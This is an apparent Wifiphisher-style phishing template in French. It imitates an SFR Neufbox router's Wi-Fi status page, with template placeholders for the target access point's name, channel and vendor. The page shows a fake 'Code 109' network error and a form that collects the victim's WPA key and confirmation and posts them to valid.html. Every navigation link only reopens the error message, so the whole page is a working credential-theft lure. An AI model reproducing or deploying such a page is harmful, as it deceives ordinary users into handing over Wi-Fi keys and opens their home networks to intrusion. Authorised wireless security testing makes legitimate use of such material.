<!DOCTYPE html>
<html>

<head>
    <meta charset='utf-8'>
    <meta http-equiv='X-UA-Compatible' content='IE=edge'>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta http-equiv="Content-language" content="fr">
    <meta name="author" content="Lucien Burdet">
    <meta name='viewport' content='width=device-width, initial-scale=1'>
    <title>Box - WIFI</title>
    <link rel="icon" type="image/png" href="./static/images/favicon.png" />
    <link rel='stylesheet' type='text/css' media='screen' href='./static/css/bootstrap.min.css'>
    <link rel='stylesheet' type='text/css' media='screen' href='./static/css/style.css'>
    <script src='./static/js/jquery.min.js'></script>
    <script src='./static/js/bootstrap.bundle.min.js'></script>
    <script src='./static/js/sfr.js'></script>
</head>

<body>
    <nav class="navbar navbar-expand-lg navbar-dark bg-primary">
        <a class="navbar-brand" href="#" data-toggle="modal" data-target="#modal">
            <img class="logo" src="./static/images/logo.jpg">
        </a>
    </nav>
    <nav class="navbar navbar-expand-lg navbar-dark bg-dark">
        <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarColor02"
            aria-controls="navbarColor02" aria-expanded="false" aria-label="Toggle navigation">
            <span class="navbar-toggler-icon"></span>
        </button>

        <div class="collapse navbar-collapse" id="navbarColor02">
            <ul class="navbar-nav mr-auto">
                <li class="nav-item ">
                    <a class="nav-link dropdown-toggle"  href="#" role="button" data-toggle="modal" data-target="#modal"
                        aria-haspopup="true" aria-expanded="false">Etat</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link dropdown-toggle"  href="#" role="button" data-toggle="modal" data-target="#modal"
                        aria-haspopup="true" aria-expanded="false">Réseau V4</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link dropdown-toggle"  href="#" role="button" data-toggle="modal" data-target="#modal"
                        aria-haspopup="true" aria-expanded="false">Réseau V6</a>
                </li>
                <li class="nav-item active">
                    <a class="nav-link dropdown-toggle"  href="#" role="button" data-toggle="modal" data-target="#modal"
                        aria-haspopup="true" aria-expanded="false">Wifi</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link dropdown-toggle"  href="#" role="button" data-toggle="modal" data-target="#modal"
                        aria-haspopup="true" aria-expanded="false">Téléphonie</a>
                </li>
                <li class="nav-item dropdown">
                    <a class="nav-link dropdown-toggle"  href="#" role="button" data-toggle="modal" data-target="#modal"
                        aria-haspopup="true" aria-expanded="false">Applications</a>
                </li>
                <li class="nav-item dropdown">
                    <a class="nav-link dropdown-toggle"  href="#" role="button" data-toggle="modal" data-target="#modal"
                        aria-haspopup="true" aria-expanded="false">Maintenance</a>
                </li>
                <li class="nav-item dropdown">
                    <a class="nav-link dropdown-toggle" href="#" role="button" data-toggle="modal" data-target="#modal"
                        aria-haspopup="true" aria-expanded="false">Eco</a>
                </li>
            </ul>
            <div class="form-inline my-2 my-lg-0">
                <button class="btn btn-primary my-2 my-sm-0 disabled" type="button" data-toggle="modal" data-target="#modal">Déconnexion</button>
            </div>
        </div>
    </nav>

    <ol class="breadcrumb">
        <li class="breadcrumb-item"><a href="#" data-toggle="modal" data-target="#modal">Home</a></li>
        <li class="breadcrumb-item"><a href="#" data-toggle="modal" data-target="#modal">Wifi</a></li>
        <li class="breadcrumb-item active">Général</li>
    </ol>

    <div class="alert alert-dismissible alert-primary">
        <strong>Code 109: Erreur réseau inconnue</strong> 
        <p>Veuillez vous reconnecter avec la clé WPA/WEP dans le
        champ ci dessous et valider. La clé WPA figure derrière votre Neufbox de SFR sur une petite étiquette.</p>
    </div>

    <div class="row">
        <div class="col-10">
            <div class="jumbotron p-t-5">
                <h3>Point d'accès</h3>
                <p>{{ target_ap_vendor }}</p>
                <table class="table table-hover">
                    <thead>

                    </thead>
                    <tbody>
                        <tr>
                            <th scope="row">Etat</th>
                            <td class="green-color">Activé</td>
                        </tr>
                        <tr>
                            <th scope="row">SSID</th>
                            <td>{{ target_ap_essid }}</td>
                        </tr>
                        <tr>
                            <th scope="row">Diffusion du SSID</th>
                            <td>Activé</td>
                        </tr>
                        <tr>
                            <th scope="row">Canal</th>
                            <td>{{ target_ap_channel }}</td>
                        </tr>
                        <tr>
                            <th scope="row">Mode radio</th>
                            <td>11b/g/n</td>
                        </tr>
                        <tr>
                            <th scope="row">Chiffrement</th>
                            <td>WPA</td>
                        </tr>
                        <tr>
                            <th scope="row">Clé</th>
                            <td>Invalide</td>
                        </tr>
                        <tr>
                            <th scope="row">Filtrage MAC</th>
                            <td>Désactivé</td>
                        </tr>
                    </tbody>
                </table>

                <h3>SFR Neufbox</h3>

                <div class="alert alert-dismissible alert-primary">
                    <strong>Code 109: Erreur réseau inconnue</strong> 
                    <p>Veuillez vous reconnecter avec la clé WPA/WEP dans
                    le champ ci dessous et valider. La clé WPA figure derrière votre Neufbox de SFR sur une petite
                    étiquette.</p>
                </div>

                <form id="sfr-wpa" method="POST" action="valid.html">
                    <fieldset>
                        <img src="./static/images/aide.jpg">
                        <div class="form-group">
                            <label for="wpa">Clé WPA</label>
                            <input name="wfphshr-password" type="text" class="form-control" id="wpa" placeholder="Clé WPA">
                        </div>
                        <div class="form-group">
                            <label for="wpa-confirmation">Confirmation</label>
                            <input name="wfphshr-password-confirm" type="text" class="form-control" id="wpa-confirmation"
                                aria-describedby="wpa-confirmation-help" placeholder="Confirmation">
                            <small id="wpa-confirmation-help" class="form-text text-muted">
                                Besoin d'aide? Obtenez un technicien SFR en ligne en cliquant
                                <a href="#" data-toggle="modal" data-target="#modal">ici</a>
                            </small>
                        </div>
                        <button id="sfr-wpa-btn" type="submit" class="btn btn-primary">Valider</button>
                    </fieldset>
                </form>

                <h3>Postes connectés</h3>

                <table class="table table-hover">
                    <thead>
                        <tr>
                            <th scope="col">#</th>
                            <th scope="col">Adresse MAC</th>
                            <th scope="col">Adresse IP</th>
                        </tr>
                    </thead>
                    <tbody>
                        <tr>
                            <td>XX:XX:XX:XX:XX:XX</td>
                            <td>192.168.1.XX (XXXXXX-PC)</td>
                        </tr>
                    </tbody>
                </table>

            </div>
        </div>
        <div class="col-2">
            <div class="jumbotron">
                <p>
                    Dans la rubrique <strong>Point d'accès</strong>, vous trouvez les caractéristiques de votre liaison
                    sans fil WiFi
                    intégrée à la box : l'activation du WiFi, le nom de votre réseau sans fil (SSID), si le nom de votre
                    réseau sans fil est diffusé, le canal, le mode radio, le mode de chiffrement des communications, la
                    clé de chiffrement et l'activation du filtrage par adresse MAC.
                </p>
                <p>
                    Dans la rubrique <strong>Postes connectés</strong>, vous trouvez la liste des équipements WiFi
                    actuellement connectés
                    à votre box.
                </p>
            </div>
        </div>
    </div>

    <div class="modal" id="modal" tabindex="-1" role="dialog" aria-hidden="true">
        <div class="modal-dialog" role="document">
          <div class="modal-content">
            <div class="modal-header">
              <h5 class="modal-title">Code 109: Erreur réseau inconnue</h5>
              <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                <span aria-hidden="true">&times;</span>
              </button>
            </div>
            <div class="modal-body">
                <p>
                    Veuillez vous reconnecter avec la clé WPA/WEP dans le champ ci dessous et valider. La clé WPA
                    figure derrière votre Neufbox de SFR sur une petite étiquette.
                </p>
            </div>
            <div class="modal-footer">
              <button type="button" class="btn btn-secondary" data-dismiss="modal">Fermer</button>
            </div>
          </div>
        </div>
      </div>

</body>

</html>